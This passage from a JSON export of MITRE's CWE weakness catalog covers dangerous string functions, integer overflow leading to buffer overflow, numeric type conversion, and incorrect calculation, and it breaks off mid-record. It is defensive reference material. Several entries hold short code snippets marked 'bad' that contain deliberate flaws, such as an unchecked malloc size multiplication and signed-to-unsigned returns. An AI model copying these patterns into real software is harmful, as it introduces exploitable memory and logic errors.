strcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1470"},{"Reference":"CVE-2009-3849","Description":"Buffer overflow using strcat()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3849"},{"Reference":"CVE-2006-2114","Description":"Buffer overflow using strcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2114"},{"Reference":"CVE-2006-0963","Description":"Buffer overflow using strcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0963"},{"Reference":"CVE-2011-0712","Description":"Vulnerable use of strcpy() changed to use safer strlcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0712"},{"Reference":"CVE-2008-5005","Description":"Buffer overflow using strcpy()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5005"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Dangerous Functions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON33-C","Entry_Name":"Avoid race conditions when using library functions","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV33-C","Entry_Name":"Do not call system()","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR07-C","Entry_Name":"Prefer functions that support error checking over equivalent functions that don\'t"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR34-C","Entry_Name":"Detect errors when converting a string to a number","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO01-C","Entry_Name":"Be careful using functions that use file names for identification"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC30-C","Entry_Name":"Do not use the rand() function for generating pseudorandom numbers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-554"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Safe String Handling&#34; Page 156, 160"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;C String Handling&#34;, Page 388"}}]},"Notes":{"Note":{"#text":"This weakness is different than CWE-242 (Use of Inherently Dangerous Function). CWE-242 covers functions with such significant security problems that they can never be guaranteed to be safe. Some functions, if used properly, do not directly pose a security risk, but can introduce a weakness if not called correctly. These are regarded as potentially dangerous. A well-known example is the strcpy() function. When provided with a destination buffer that is larger than its source, strcpy() will not overflow. However, it is so often misused that some developers prohibit strcpy() entirely.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Other_Notes, References, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"680":{"attr":{"@_ID":"680","@_Name":"Integer Overflow to Buffer Overflow","@_Abstraction":"Compound","@_Structure":"Chain","@_Status":"Draft"},"Description":"The product performs a calculation to determine how much memory to allocate, but an integer overflow can occur that causes less memory to be allocated than expected, leading to a buffer overflow.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"StartsWith","@_CWE_ID":"190","@_View_ID":"709","@_Chain_ID":"680"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-1000121","Description":"chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000121"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT30-C","Entry_Name":"Ensure that unsigned integer operations do not wrap","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT32-C","Entry_Name":"Ensure that operations on signed integers do not result in overflow","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object","Mapping_Fit":"CWE More Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}},{"attr":{"@_CAPEC_ID":"92"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Observed_Examples, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"}]}},"681":{"attr":{"@_ID":"681","@_Name":"Incorrect Conversion between Numeric Types","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"When converting from one data type to another, such as long to integer, data can be omitted or translated in a way that produces unexpected values. If the resulting values are used in a sensitive context, then dangerous behaviors may occur.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"682","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Other","Integrity"],"Impact":["Unexpected State","Quality Degradation"],"Note":"The program could wind up using the wrong number and generate incorrect results. If the number is used to allocate resources or make a security decision, then this could introduce a vulnerability."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Avoid making conversion between numeric types. Always check for the allowed ranges."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java example, a float literal is cast to an integer, thus causing a loss of precision.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"int i = (int) 33457.8f;"}},{"Intro_Text":"This code adds a float and an integer together, casting the result to an integer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$floatVal = 1.8345;$intVal = 3;$result = (int)$floatVal + $intVal;","xhtml:br":["",""]}},"Body_Text":"Normally, PHP will preserve the precision of this operation, making $result = 4.8345. After the cast to int, it is reasonable to expect PHP to follow rounding convention and set $result = 5. However, the explicit cast to int always rounds DOWN, so the final value of $result is 4. This behavior may have unintended consequences."},{"attr":{"@_Demonstrative_Example_ID":"DX-73"},"Intro_Text":"In this example the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned int, amount will be implicitly converted to unsigned.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int readdata () {}","xhtml:div":{"#text":"int amount = 0;...if (result == ERROR)amount = -1;...return amount;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},"Body_Text":"If the error condition in the code above is met, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers."},{"attr":{"@_Demonstrative_Example_ID":"DX-74"},"Intro_Text":"In this example, depending on the return value of accecssmainframe(), the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned value, amount will be implicitly cast to an unsigned number.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int readdata () {}","xhtml:div":{"#text":"int amount = 0;...amount = accessmainframe();...return amount;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}},"Body_Text":"If the return value of accessmainframe() is -1, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"},{"Reference":"CVE-2007-4988","Description":"Chain: signed short width value in image processor is sign extended during conversion to unsigned int, which leads to integer overflow and heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4988"},{"Reference":"CVE-2009-0231","Description":"Integer truncation of length value leads to heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0231"},{"Reference":"CVE-2008-3282","Description":"Size of a particular type changes for 64-bit platforms, leading to an integer truncation in document processor causes incorrect index to be generated.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3282"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP34-C","Entry_Name":"Ensure that floating point conversions are within range of the new type","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT15-C","Entry_Name":"Use intmax_t or uintmax_t for formatted IO on programmer-defined integer types"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT35-C","Entry_Name":"Evaluate integer expressions in a larger size before comparing or assigning to that size"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"NUM12-J","Entry_Name":"Ensure conversions of numeric types to narrower types do not result in lost or misinterpreted data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-681"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-681"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Observed_Examples, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"682":{"attr":{"@_ID":"682","@_Name":"Incorrect Calculation","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs a calculation that generates incorrect or unintended results that are later used in security-critical decisions or resource management.","Extended_Description":"When software performs a security-critical calculation incorrectly, it might lead to incorrect resource allocations, incorrect privilege assignments, or failed comparisons among other things. Many of the direct results of an incorrect calculation can lead to even larger problems such as failed protection mechanisms or even arbitrary code execution.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"170","@_View_ID":"1000"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the incorrect calculation causes the program to move into an unexpected state, it may lead to a crash or impairment of service."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands"],"Note":"If the incorrect calculation is used in the context of resource allocation, it could lead to an out-of-bounds operation (CWE-119) leading to a crash or even arbitrary code execution. Alternatively, it may result in an integer overflow (CWE-190) and / or a resource consumption problem (CWE-400)."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"In the context of privilege or permissions assignment, an incorrect calculation can provide an attacker with access to sensitive resources."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If the incorrect calculation leads to an insufficient comparison (CWE-697), it may compromise a protection mechanism such as a validation routine and allow an attacker to bypass the security-critical code."}]},"Detection_Methods":{"Detection_Method":{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Understand your programming language\'s underlying representation and how it interacts with numeric calculation. Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, \\"not-a-number\\" calculations, and how your language handles numbers that are too large or too small for its underlying representation."},{"attr":{"@_Mitigation_ID":"MIT-8"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range."},{"Phase":"Implementation","Description":"Use the appropriate type for the desired action. For example, in C/C++, only use unsigned types for values that could never be negative, such as height, width, or other numbers related to quantity."},{"Phase":"Architecture and Design","Strategy":"Language Selection","Description":{"xhtml:p":["Use languages, libraries, or frameworks that make it easier to handle numbers without unexpected consequences.","Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++)."]}},{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use languages, libraries, or frameworks that make it easier to handle numbers without unexpected consequences.","Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++)."]}},{"attr":{"@_Mitigation_ID":"MIT-26"},"Phase":"Implementation","Strategy":"Compilation or Build Hardening","Description":"Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-33"},"Intro_Text":"The following image processing code allocates a table for images.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);...","xhtml:br":["","","","",""]}},"Body_Text":"This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119)."},{"Intro_Text":"This code attempts to calculate a football team\'s average number of yards gained per touchdown.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...int touchdowns = team.getTouchdowns();int yardsGained = team.getTotalYardage();System.out.println(team.getName() + \\" averages \\" + yardsGained / touchdowns + \\"yards gained for every touchdown scored\\");...","xhtml:br":["","","",""]}},"Body_Text":"The code does not consider the event that the team they are querying has not scored a touchdown, but has gained yardage. In that case, we should expect an ArithmeticException to be thrown by the JVM. This could lead to a loss of availability if our error handling code is not set up correctly."},{"attr":{"@_Demonstrative_Example_ID":"DX-55"},"Intro_Text":"This example attempts to calculate the position of the second byte of a pointer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int *p = x;char * second_char = (char *)(p + 1);","xhtml:br":""}},"Body_Text":"In this example, second_char is intended to point to the second byte of p. But, adding 1 to p actually adds sizeof(int) to p, giving a result that is incorrect (3 bytes off on 32-bit platforms). If the resulting memory address is read, this could potentially be an information leak. If it is a write, it could be a security-critical write to unauthorized memory-- whether or not it is a buffer overflow. Note that the above code may also be wrong in other ways, particularly in a little endian environment."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-0022","Description":"chain: mobile phone Bluetooth implementation does not include offset when calculating packet length (CWE-682), leading to out-of-bounds write (CWE-787)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0022"},{"Reference":"CVE-2004-1363","Description":"substitution overflow: buffer overflow using environment variables that are expanded after the length check is performed","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1363"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP32-C","Entry_Name":"Prevent or detect domain and range errors in math functions","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT07-C","Entry_Name":"Use only explicitly signed or unsigned char type for numeric values"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT13-C","Entry_Name":"Use bitwise operators only on unsigned operands"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT33-C","Entry_Name":"Ensure that division and remainder operations do not result in divide-by-zero errors","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT34-C","Entry_Name":"Do not shift an expression by a negative number of bits or by greater than or equal  to the number of bits that exist in the operand","Mapping_Fit":"CWE More Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"128"}},{"attr":{"@_CAPEC_ID":"129"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-106"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 7: Integer Overflows.&#34; Page 119"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Signed Integer Boundaries&#34;, Page 220"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Observed_Examples, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 